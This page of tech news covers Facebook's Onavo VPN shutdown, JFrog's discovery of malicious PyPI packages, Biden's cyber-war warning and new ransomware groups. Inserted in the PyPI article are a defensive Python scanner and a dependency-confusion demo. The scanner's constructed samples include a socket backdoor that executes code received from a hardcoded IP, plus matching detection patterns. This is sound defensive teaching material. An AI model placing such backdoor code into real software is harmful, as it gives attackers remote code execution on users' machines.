
Biz & IT

Facebook will shut down its spyware VPN app Onavo

Facebook will end its unpaid market research programs and proactively take its Onavo VPN app off the Google Play store in the wake of backlash following TechCrunch’s investigation about Onavo code being used in a Facebook Research app that sucked up data about teens. The Onavo Protect app will eventually shut down. It will immediately cease pulling in data from users for market research, though it will continue operating as a Virtual Private Network in the short term to allow users to find a replacement.

Facebook has also ceased recruiting new users for the Facebook Research app, which still runs on Android but was forced off iOS by Apple after we reported on how it violated Apple’s Enterprise Certificate program for employee-only apps. Existing Facebook Research app studies will continue to run, though.

With the suspicions about tech giants and looming regulation leading to more intense scrutiny of privacy practices, Facebook has decided that giving users a utility like a VPN in exchange for quietly examining their app usage and mobile browsing data isn’t a wise strategy. Instead, it will focus on paid programs where users explicitly understand what privacy they’re giving up for direct financial compensation.

Onavo billed itself as a way to “limit apps from using background data” and “use a secure VPN network for your personal info,” but also noted it would collect the “Time you spend using apps, mobile and Wi-Fi data you use per app, the websites you visit, and your country, device and network type.” A Facebook spokesperson confirmed the change and provided this statement: “Market research helps companies build better products for people. We are shifting our focus to reward-based market research which means we’re going to end the Onavo program.”

Facebook acquired Onavo in 2013 for a reported $200 million to use its VPN app to gather data about what people were doing on their phones. That data revealed WhatsApp was sending over twice as many messages per day as Messenger, BuzzFeed’s Ryan Mac and Charlie Warzel reported, convincing Facebook to pay a steep sum of $19 billion to buy WhatsApp. Facebook went on to frame Onavo as a way for users to reduce their data usage, block dangerous websites, and keep their traffic safe from snooping, while Facebook itself was analyzing that traffic. The insights helped it discover new trends in mobile usage, keep an eye on competitors, and figure out what features or apps to copy. Cloning became core to Facebook’s product strategy over the past years, with Instagram’s version of Snapchat Stories growing larger than the original.

But last year, privacy concerns led Apple to push Facebook to remove the Onavo VPN app from the App Store, though it continued running on Google Play. Facebook then quietly repurposed Onavo code for use in its Facebook Research app, which TechCrunch found was paying users in the U.S. and India ages 13 to 35 up to $20 in gift cards per month to give it VPN and root network access to spy on all their mobile data.

Facebook ran the program in secret, obscured by intermediary beta testing services like Betabound and Applause. It only informed users it recruited with ads on Instagram, Snapchat and elsewhere that they were joining a Facebook Research program after they’d begun signup and signed non-disclosure agreements. A Facebook spokesperson claimed in a statement that “there was nothing ‘secret’ about this”, yet it had threatened legal action if users publicly discussed the Research program.

But the biggest problem for Facebook ended up being that its Research app abused Apple’s Enterprise Certificate program, meant for employee-only apps, to distribute the app outside the company. That led Apple to ban the Research app from iOS and invalidate Facebook’s certificate, which caused Facebook’s internal iOS collaboration tools, pre-launch test versions of its popular apps, and even its lunch menu and shuttle schedule to break for 30 hours, causing chaos at the company’s offices.

To preempt any more scandals around Onavo and the Facebook Research app and avoid Google stepping in to forcibly block the apps, Facebook is now taking Onavo off the Play Store and stopping recruitment of Research testers. That’s a surprising voluntary move that perhaps shows Facebook is finally getting in tune with the public perception of its shady actions. The company has repeatedly misread how users would react to its product launches and privacy invasions, leading to near constant gaffes and an unending news cycle chronicling its blunders.

Without Onavo, Facebook loses a powerful method of market research, and its future initiatives here will come at a higher price. Facebook has run tons of focus groups, surveys, and other user feedback programs over the past decade to learn where it could improve or what innovations it could co-opt. And with more apps recently turning on encryption, Onavo likely started learning less about their usage. But given how cloning plus acquisitions like WhatsApp and Instagram have been vital to Facebook’s success, it’s likely worth paying out more gift cards and more tightly monitoring its research practices. Otherwise Facebook could miss the next big thing that might disrupt it.

Hopefully Facebook will be less clandestine with its future market research programs. It should be upfront about its involvement, make certain that users understand what data they’re giving up, stop researching teens or at the very least verify the consent of their parents, and avoid slurping up sensitive information or data about a user’s unwitting friends. For a company that depends on people to trust it with their content, it has a long way to go to win back our confidence.

Malicious PyPI packages caught stealing developer data and injecting code

Open source packages downloaded an estimated 30,000 times from the PyPI open source repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code on infected machines, researchers said on Thursday.

In a post, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of security firm JFrog said they recently found eight packages in PyPI that carried out a range of malicious activity. Based on searches on https://pepy.tech, a site that provides download stats for Python packages, the researchers estimate the malicious packages were downloaded about 30,000 times.

Systemic threat

The discovery is the latest in a long line of attacks in recent years that abuse the receptivity of open source repositories, which millions of software developers rely on daily. Despite their crucial role, repositories often lack robust security and vetting controls, a weakness that has the potential to cause serious supply chain attacks when developers unknowingly infect themselves or fold malicious code into the software they publish.

“The continued discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability for attackers to use simple obfuscation techniques to introduce malware means developers have to be concerned and vigilant. This is a systemic threat, and it needs to be actively addressed on several layers, both by the maintainers of software repositories and by the developers.”

The researchers thanked PyPI maintainer Dustin Ingram “for quickly responding and removing the malicious packages” when notified. Ingram didn’t immediately respond to a request for comment.

Different packages from Thursday’s haul carried out different kinds of nefarious activities. Six of them had three payloads, one for harvesting authentication cookies for Discord accounts, a second for extracting any passwords or payment card data stored by browsers, and the third for gathering information about the infected PC, such as IP addresses, computer name, and user name.

The remaining two packages had malware that tries to connect to an attacker-designated IP address on TCP port 9009 and then execute whatever Python code is available from the socket. It’s not known what the IP address was or whether there was malware hosted on it.

Like most novice Python malware, the packages used only simple obfuscation, such as Base64 encoding. Here’s a breakdown of the packages:

Package name   Maintainer   Payload
noblesse       xin1111      Discord token stealer, credit card stealer (Windows-based)
genesisbot     xin1111      Same as noblesse
are            xin1111      Same as noblesse
suffer         suffer       Same as noblesse, obfuscated by PyArmor
noblesse2      suffer       Same as noblesse
noblessev2     suffer       Same as noblesse
pytagora       leonora123   Remote code injection
pytagora2      leonora123   Same as pytagora
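The two payload patterns described above (an exec() of Base64-decoded text, and a socket connect to a fixed IP:port whose bytes are handed to exec()) are cheap to triage statically before a package ever runs. The following is an added example, not JFrog’s tooling and not the source of any of the listed packages: a small ast-based scanner run over constructed snippets that model the described behaviour. The sample code, the documentation-only address 203.0.113.5, and the chosen decoder and socket-read names are assumptions, not facts from the research.

```python
"""Static triage for the two payload patterns the article describes:
(1) exec()/eval() of Base64-decoded text, (2) a socket connect to a hardcoded
IP:port whose received bytes are fed to exec().  Added example; not JFrog's
tooling and not the real package source.  Run on a file or a package tree."""
import ast
import ipaddress
import pathlib
import sys

DECODERS = {"b64decode", "b32decode", "b16decode", "b85decode", "a85decode"}
SOCKET_READS = {"recv", "recv_into", "recvfrom", "makefile"}

# Constructed samples modelling the described behaviour (not the real
# noblesse/pytagora code).  203.0.113.5 is a documentation-only address.
SAMPLE_STEALER = '''
import base64
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
'''
SAMPLE_BACKDOOR = '''
import socket
s = socket.socket()
s.connect(("203.0.113.5", 9009))
exec(s.recv(4096))
'''
SAMPLE_BENIGN = '''
import base64
token = base64.b64encode(b"session").decode()
'''


def _callee(node):
    """Bare callee name of a Call ('exec', 'b64decode', ...) or None."""
    if not isinstance(node, ast.Call):
        return None
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


def _first_callee_in(node, names):
    """First callee name in node's subtree that is in names, else None."""
    for sub in ast.walk(node):
        c = _callee(sub)
        if c in names:
            return c
    return None


def _literal_endpoint(node):
    """('ip', port) if node is a 2-tuple of constants whose host is an IP literal."""
    if isinstance(node, ast.Tuple) and len(node.elts) == 2:
        host, port = node.elts
        if (isinstance(host, ast.Constant) and isinstance(host.value, str)
                and isinstance(port, ast.Constant) and isinstance(port.value, int)):
            try:
                ipaddress.ip_address(host.value)
            except ValueError:
                return None
            return host.value, port.value
    return None


def scan_source(src, filename="<string>"):
    """Return a list of (kind, lineno, detail) findings for one Python source."""
    findings = []
    for node in ast.walk(ast.parse(src, filename=filename)):
        callee = _callee(node)
        if callee in ("exec", "eval"):
            for arg in node.args:
                dec = _first_callee_in(arg, DECODERS)
                if dec:
                    findings.append(("obfuscated_exec", node.lineno, dec))
                rd = _first_callee_in(arg, SOCKET_READS)
                if rd:
                    findings.append(("exec_from_socket", node.lineno, rd))
        elif callee in ("connect", "connect_ex") and node.args:
            ep = _literal_endpoint(node.args[0])
            if ep:
                findings.append(("hardcoded_ip_connect", node.lineno, f"{ep[0]}:{ep[1]}"))
    return findings


def scan_tree(root):
    """Scan every .py file under root (setup.py and __init__.py included)."""
    results = {}
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            hits = scan_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue  # unparsable file: not a proof of innocence, inspect by hand
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for f, hits in scan_tree(sys.argv[1]).items():
            for kind, line, detail in hits:
                print(f"{f}:{line}: {kind} ({detail})")
    else:
        for s in (SAMPLE_STEALER, SAMPLE_BACKDOOR, SAMPLE_BENIGN):
            print(scan_source(s))
```

Point it at an unpacked sdist (`python scan.py ./package-1.0/`) before installing. The scanner is deliberately narrow: it flags the specific shapes described in the research, and a PyArmor-packed payload like the one in `suffer` will not parse into an exec(b64decode(...)) call, so a clean result is a reason to look at the unpacked files, not a reason to trust them.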

Karas told me that the first six packages had the ability to infect the developer computer but couldn’t taint the code developers wrote with malware.

“For both the pytagora and pytagora2 packages, which allow code execution on the machines they were installed on, this would be possible,” he said in a direct message. “After infecting the development machine, they would allow code execution and then a payload could be downloaded by the attacker that would modify the software projects under development. However, we don’t have evidence that this was actually done.”

Beware of ‘Frankenstein’ malware packages

Rather than spending days developing code that performs everyday tasks, coders can instead turn to repositories like PyPI, RubyGems, or npm to obtain mature app packages that peers have already developed. Among the 2.7 million packages available on PyPI, for example, are ones developers can use to make apps predict a home’s selling price using data scraped from the Internet, send emails through Amazon’s Simple Email Service, or check open source code for vulnerabilities. PyPI provides packages for software written in Python, while RubyGems and npm provide packages for Ruby and JavaScript apps.

This crucial role makes repositories the ideal setting for supply-chain attacks, which have grown increasingly common using techniques known as typosquatting or dependency confusion.

Repository supply-chain attacks date back to at least 2016, when a college student uploaded malicious packages to PyPI. Over a span of several months, his imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was given all-powerful administrative rights.
Since then, supply-chain attacks have become a regular occurrence for RubyGems and npm.
In recent months, white hat hackers have cooked up a new type of supply-chain attack that works by uploading malicious packages to public code repositories and giving them a name that’s identical to a package stored in the internal repository for a popular piece of software. These so-called dependency confusion attacks have already snared Apple, Microsoft, and 33 other companies.
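What makes the attack in the previous paragraph work is a resolution rule rather than a bug: when a private index is added with pip’s `--extra-index-url`, candidates from every configured index are pooled and the highest version wins, so a public package with the same name and a larger version number is the one that gets installed. Below is an added example, not pip’s code and not from the JFrog research, that models that rule against constructed internal and public indexes and then the hardened form, in which each package is pinned to one index, one version and the artifact’s hash (what `--index-url` and `--require-hashes` enforce). The package name acme-billing, the version numbers and the artifact bytes are all made up for the example.

```python
"""Models why --extra-index-url enables dependency confusion and what pinning
fixes.  Added example: a toy resolver, not pip's implementation.  Indexes,
package names, versions and 'artifact' bytes are all constructed."""
import hashlib

# package -> version -> artifact bytes (stand-in for a wheel file)
INTERNAL_INDEX = {
    "acme-billing": {"1.4.2": b"internal wheel 1.4.2", "1.4.3": b"internal wheel 1.4.3"},
}
# The attacker has published the private name on the public index, both with a
# huge version number and with the exact internal version number.
PUBLIC_INDEX = {
    "acme-billing": {"1.4.3": b"attacker wheel posing as 1.4.3", "99.0.0": b"attacker wheel 99.0.0"},
    "requests": {"2.26.0": b"genuine public wheel"},
}
INDEXES = {"internal": INTERNAL_INDEX, "public": PUBLIC_INDEX}


def parse_version(v):
    """Dotted-integer versions only (assumption; real pip uses PEP 440)."""
    return tuple(int(p) for p in v.split("."))


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def resolve_extra_index(name, indexes=INDEXES):
    """`pip install name --index-url public --extra-index-url internal`:
    candidates are pooled across all indexes and the highest version wins,
    regardless of which index it came from."""
    cands = [(parse_version(v), idx) for idx, pkgs in indexes.items()
             for v in pkgs.get(name, {})]
    if not cands:
        raise LookupError(name)
    ver, idx = max(cands)  # ties on version are broken arbitrarily here
    return ".".join(map(str, ver)), idx


def resolve_locked(name, lock, indexes=INDEXES):
    """Hardened: the lock names one index, one version and the artifact hash
    for each package (what --index-url plus --require-hashes enforce).  A
    same-name package on another index, or a same-version artifact with
    different bytes, is refused instead of installed."""
    entry = lock[name]
    artifact = indexes[entry["index"]].get(name, {}).get(entry["version"])
    if artifact is None:
        raise LookupError(f"{name}=={entry['version']} not on index {entry['index']}")
    if sha256(artifact) != entry["sha256"]:
        raise ValueError(f"hash mismatch for {name}=={entry['version']} "
                         f"from {entry['index']}")
    return entry["version"], entry["index"]


# Lock file as it would be generated from the reviewed artifacts.
LOCK = {
    "acme-billing": {"index": "internal", "version": "1.4.3",
                     "sha256": sha256(INTERNAL_INDEX["acme-billing"]["1.4.3"])},
    "requests": {"index": "public", "version": "2.26.0",
                 "sha256": sha256(PUBLIC_INDEX["requests"]["2.26.0"])},
}


def demo():
    """Returns (naive_result, locked_result, tampered_rejected)."""
    naive = resolve_extra_index("acme-billing")      # ('99.0.0', 'public')
    locked = resolve_locked("acme-billing", LOCK)    # ('1.4.3', 'internal')
    # Same version number, wrong index: the pinned hash catches the swap.
    tampered = {**LOCK, "acme-billing": {**LOCK["acme-billing"], "index": "public"}}
    try:
        resolve_locked("acme-billing", tampered)
        rejected = False
    except ValueError:
        rejected = True
    return naive, locked, rejected


if __name__ == "__main__":
    print(demo())
```

The version-number hijack is the case the article describes; the hash check matters for the quieter variant where the attacker republishes the same version string. In a real pip setup the equivalent is a single `--index-url` pointing at a proxy that serves the private namespace, a requirements file with `--hash=sha256:...` entries, and `--require-hashes` so an unpinned or mismatched artifact fails the install rather than succeeding.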

The JFrog researchers said that, based on the current state of repository security, the Internet is likely to see more attacks in the future.

“Almost all of the code snippets analyzed in this research were based on known public tools, with only a few parameters changed,” they wrote. “The obfuscation was also based on public obfuscators. We expect to see more of these ‘Frankenstein’ malware packages stitched from different attack tools (with changed exfiltration parameters).”

Biden warns cyber attacks could lead to a “real shooting war”

US President Joe Biden, NATO Secretary General Jens Stoltenberg and Belgian Prime Minister Alexander De Croo attend a plenary session of a NATO summit at the North Atlantic Treaty Organization (NATO) headquarters in Brussels, on June 14, 2021.

President Joe Biden has warned that cyberattacks could escalate into a full-blown war as tensions with Russia and China mounted over a series of hacking incidents targeting US government agencies, companies, and infrastructure.

Biden said on Tuesday that cyber threats including ransomware attacks “increasingly are able to cause damage and disruption in the real world.”

“If we end up in a war, a real shooting war with a major power, it’s going to be as a consequence of a cyber breach,” the president said in a speech at the Office for the Director of National Intelligence, which oversees 18 US intelligence agencies.

A number of recent hacks revealed the extent of US cyber vulnerability, ranging from extensive espionage breaches that have struck at the heart of government to ransomware attacks that have brought operations at an important oil pipeline and meat packing plants to a halt.

The Biden administration has accused the governments of Russia and China, or hackers based inside the two countries, of some of the attacks. US officials have warned that the administration would respond with a “mix of tools seen and unseen,” but cyber breaches have continued.

Although he did not say who such a war might be fought against, Biden immediately name-checked Russia’s president Vladimir Putin, alleging that Russia was spreading misinformation ahead of the 2022 US midterm elections.

“It’s a pure violation of our sovereignty,” he said.

“Mr. Putin… has a real problem. He is sitting on top of an economy that has nuclear weapons and oil wells and nothing else. Nothing else,” Biden said. “He knows he’s in real trouble, which makes him even more dangerous.”

At a June summit in Geneva, Biden personally warned Putin that the US would “respond with cyber” if the Russian state or Russian-based hackers targeted critical US infrastructure.

The prohibited sectors spanned energy, health care, IT, and commercial facilities, all of which have already allegedly been targeted by Russian hackers since the 2020 US elections. Others included transport, financial services, and chemicals.

Biden also said Chinese President Xi Jinping was “deadly earnest” about China becoming the most powerful military force in the world by the 2040s, as well as the largest and most prominent economy.

“It’s real… This boy’s got a plan,” Biden said, adding: “We better figure out how we’re going to keep pace without exacerbating [the situation].”

Biden stressed that cyberattacks were just one aspect of the growing threats facing the US, saying that there would be more developments in the next 10 years than in the past 50, placing a tremendous burden on the intelligence community.

“It’s really going to get tougher,” he said.

© 2021 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Haron and BlackMatter are the latest groups to crash the ransomware party

July has so far ushered in at least two new ransomware groups. Or maybe they’re old ones undergoing a rebranding. Researchers are in the process of running down several different theories.

Both groups say they are aiming for big-game targets, meaning corporations or other large businesses with the pockets to pay ransoms in the millions of dollars. The additions come as recent ransomware intrusions of oil pipeline operator Colonial Pipeline, meat packer JBS SA, and managed network provider Kaseya have caused major disruptions and created pressure in Washington to curb the threats.

Haron: like Avaddon. Or maybe not

The first group is calling itself Haron. A sample of the Haron malware was first submitted to VirusTotal on July 19. Three days later, South Korean security firm S2W Lab discussed the group in a post.

Most of the group’s site on the dark web is password protected by extremely weak credentials. Once past the login page, there’s a list of alleged targets, a chat transcript that’s not fit to be shown in full, and the group’s explanation of its mission.

As S2W Lab pointed out, the layout, organization, and appearance of the site are almost identical to those for Avaddon, the ransomware group that went dark in June after sending a master decryption key to BleepingComputer that victims could use to recover their data.

The similarity on its own isn’t especially meaningful. It could mean that the creator of the Haron site had a hand in administering the Avaddon site. Or it could be the Haron site creator doing a headfake.

A connection between Haron and Avaddon would be more convincing if there were overlaps or similarities in the code used by the two groups. So far there are no such links reported.

The engine driving Haron ransomware, according to S2W Lab, is Thanos, a separate piece of ransomware that has been around since at least 2019. Haron was developed using a recently published Thanos builder for the C# programming language. Avaddon, by contrast, was written in C++.

Jim Walter, a senior threat researcher at security firm SentinelOne, said in a text message that he spotted what appear to be similarities with Avaddon in a couple of samples he recently started analyzing. He said he’d know more soon.

In the shadows of REvil and DarkSide

The second ransomware newcomer is calling itself BlackMatter. It was reported on Tuesday by security firm Recorded Future and its news arm The Record.

Recorded Future, The Record, and security firm Flashpoint, which also covered the emergence of BlackMatter, have questioned if the group has connections to either DarkSide or REvil. Those two ransomware groups suddenly went dark after attacks—against global meat producer JBS and managed network services provider Kaseya in REvil’s case and Colonial Pipeline in the case of DarkSide—generated more attention than the groups wanted. The Justice Department later claimed to have recovered $2.3 million from Colonial’s ransomware payment of $4.4 million.

But once again, the similarities at this point are all cosmetic and include the wording of a pledge, first made by DarkSide, not to target hospitals or critical infrastructure. Given the heat US President Joe Biden is trying to put on his Russian counterpart to crack down on ransomware groups operating in Eastern Europe, it wouldn’t be surprising to see all groups follow DarkSide’s lead.

None of this is to say that the speculation is wrong, only that at the moment there’s little more than hunches for support.
